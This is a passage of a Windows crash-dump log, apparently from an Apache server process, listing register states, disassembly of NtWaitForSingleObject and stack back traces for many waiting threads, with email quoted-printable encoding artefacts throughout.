        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:01efcf4e=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0147FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0147FF78 6FF6B62A 00000006 780060CE 00000006 0012FFB0 =
kernel32!WaitForSingleObject=20
0147FFB4 77E96523 005A5908 0012FFB0 0012FFB0 005A5908 !ap_start_restart =

0147FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x500

eax=3D00000001 ebx=3D00000000 ecx=3D0157f008 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0157fee4 ebp=3D0157ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:01ffd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:01ffc5da=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0157FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0157FF78 6FF6B62A 00000007 780060CE 00000007 0012FFB0 =
kernel32!WaitForSingleObject=20
0157FFB4 77E96523 005A5990 0012FFB0 0012FFB0 005A5990 !ap_start_restart =

0157FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x508

eax=3D88888889 ebx=3D00000000 ecx=3D00629238 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0167fee4 ebp=3D0167ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:020fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:010a680a=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0167FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0167FF78 6FF6B62A 00000008 780060CE 00000008 0012FFB0 =
kernel32!WaitForSingleObject=20
0167FFB4 77E96523 005A5A18 0012FFB0 0012FFB0 005A5A18 !ap_start_restart =

0167FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x50c

eax=3D00629288 ebx=3D00000000 ecx=3D0177de50 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0177fee4 ebp=3D0177ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:021fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:021fb422=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0177FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0177FF78 6FF6B62A 00000009 780060CE 00000009 0012FFB0 =
kernel32!WaitForSingleObject=20
0177FFB4 77E96523 005A5AA0 0012FFB0 0012FFB0 005A5AA0 !ap_start_restart =

0177FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x634

eax=3D00000130 ebx=3D00000000 ecx=3D04046ec0 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0187fee4 ebp=3D0187ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:022fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04ac4492=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0187FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0187FF78 6FF6B62A 0000000A 780060CE 0000000A 0012FFB0 =
kernel32!WaitForSingleObject=20
0187FFB4 77E96523 005A5B28 0012FFB0 0012FFB0 005A5B28 !ap_start_restart =

0187FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x5e0

eax=3D040c5554 ebx=3D00000000 ecx=3D040c5247 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0197fee4 ebp=3D0197ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:023fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04b42819=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0197FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0197FF78 6FF6B62A 0000000B 780060CE 0000000B 0012FFB0 =
kernel32!WaitForSingleObject=20
0197FFB4 77E96523 005A5BB0 0012FFB0 0012FFB0 005A5BB0 !ap_start_restart =

0197FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x648

eax=3D00000006 ebx=3D00000000 ecx=3D0000006f edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D01a7fee4 ebp=3D01a7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:024fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d641=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
01A7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
01A7FF78 6FF6B62A 0000000C 780060CE 0000000C 0012FFB0 =
kernel32!WaitForSingleObject=20
01A7FFB4 77E96523 005A5C38 0012FFB0 0012FFB0 005A5C38 !ap_start_restart =

01A7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x58c

eax=3D00000000 ebx=3D00000000 ecx=3D01000101 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D01b7fee4 ebp=3D01b7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:025fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:01a7d6d3=3D531ba86f
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
01B7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
01B7FF78 6FF6B62A 0000000D 780060CE 0000000D 0012FFB0 =
kernel32!WaitForSingleObject=20
01B7FFB4 77E96523 005A5CC0 0012FFB0 0012FFB0 005A5CC0 !ap_start_restart =

01B7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x698

eax=3D01c7fe7c ebx=3D00000000 ecx=3D6ffa59f0 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D01c7fee4 ebp=3D01c7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:026fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:70a22fc2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
01C7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
01C7FF78 6FF6B62A 0000000E 780060CE 0000000E 0012FFB0 =
kernel32!WaitForSingleObject=20
01C7FFB4 77E96523 005A5D48 0012FFB0 0012FFB0 005A5D48 !ap_start_restart =

01C7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x694

eax=3D00000000 ebx=3D00000000 ecx=3Dfffffffe edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D01d7fee4 ebp=3D01d7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:027fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d0=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
01D7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
01D7FF78 6FF6B62A 0000000F 780060CE 0000000F 0012FFB0 =
kernel32!WaitForSingleObject=20
01D7FFB4 77E96523 005A5DD0 0012FFB0 0012FFB0 005A5DD0 !ap_start_restart =

01D7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x574

eax=3D00000000 ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D01e7fee4 ebp=3D01e7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:028fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
01E7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
01E7FF78 6FF6B62A 00000010 780060CE 00000010 0012FFB0 =
kernel32!WaitForSingleObject=20
01E7FFB4 77E96523 005A5E58 0012FFB0 0012FFB0 005A5E58 !ap_start_restart =

01E7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x588

eax=3D00000000 ebx=3D00000000 ecx=3Dff676980 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D01f7fee4 ebp=3D01f7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:029fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:000f3f52=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
01F7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
01F7FF78 6FF6B62A 00000011 780060CE 00000011 0012FFB0 =
kernel32!WaitForSingleObject=20
01F7FFB4 77E96523 005A5EE0 0012FFB0 0012FFB0 005A5EE0 !ap_start_restart =

01F7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x628

eax=3D00000000 ebx=3D00000000 ecx=3Dffffffca edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0207fee4 ebp=3D0207ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:02afd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d59c=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0207FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0207FF78 6FF6B62A 00000012 780060CE 00000012 0012FFB0 =
kernel32!WaitForSingleObject=20
0207FFB4 77E96523 005A5F68 0012FFB0 0012FFB0 005A5F68 !ap_start_restart =

0207FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4d0

eax=3D00000000 ebx=3D00000000 ecx=3D0000106e edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0217fee4 ebp=3D0217ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:02bfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7e640=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0217FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0217FF78 6FF6B62A 00000013 780060CE 00000013 0012FFB0 =
kernel32!WaitForSingleObject=20
0217FFB4 77E96523 005A5FF0 0012FFB0 0012FFB0 005A5FF0 !ap_start_restart =

0217FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x61c

eax=3D040d5b77 ebx=3D00000000 ecx=3D040d5847 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0227fee4 ebp=3D0227ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:02cfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04b52e19=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0227FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0227FF78 6FF6B62A 00000014 780060CE 00000014 0012FFB0 =
kernel32!WaitForSingleObject=20
0227FFB4 77E96523 005A6078 0012FFB0 0012FFB0 005A6078 !ap_start_restart =

0227FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x1cc

eax=3D00511ffc ebx=3D00000000 ecx=3D7ffa3000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0237fee4 ebp=3D0237ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:02dfd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:80a205d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0237FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0237FF78 6FF6B62A 00000015 780060CE 00000015 0012FFB0 kernel32!WaitForSi=
ngleObject=20
0237FFB4 77E96523 005A6100 0012FFB0 0012FFB0 005A6100 !ap_start_restart =

0237FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x60c

eax=3D00000000 ebx=3D00000000 ecx=3Dffffffee edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0247fee4 ebp=3D0247ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:02efd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5c0=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0247FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0247FF78 6FF6B62A 00000016 780060CE 00000016 0012FFB0 =
kernel32!WaitForSingleObject=20
0247FFB4 77E96523 005A6188 0012FFB0 0012FFB0 005A6188 !ap_start_restart =

0247FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x608

eax=3D00629420 ebx=3D00000000 ecx=3D04339ae0 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0257fee4 ebp=3D0257ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:02ffd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:04db70b2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
